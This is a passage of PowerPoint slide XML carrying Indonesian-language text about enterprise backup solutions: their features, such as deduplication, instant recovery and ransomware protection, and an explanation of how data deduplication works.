              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sederhana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur-fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>canggih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>replikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, failover </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beragam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>geografis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membentuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> modern.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur-fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (virtual, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan cloud)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Deduplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompresi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengoptimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>replikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>instan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ransomware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Opsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> granular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file, folder, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> individual</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Alat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peringatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Integrasi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>virtualisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>populer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Deduplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggambarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompresi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengoptimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghilangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlebihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Teknik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menganalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>blok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kumpulan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membandingkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>blok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alih-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>salinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deduplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>salinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>referensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penunjuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>salinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Deduplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>blok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> byte. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Deduplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
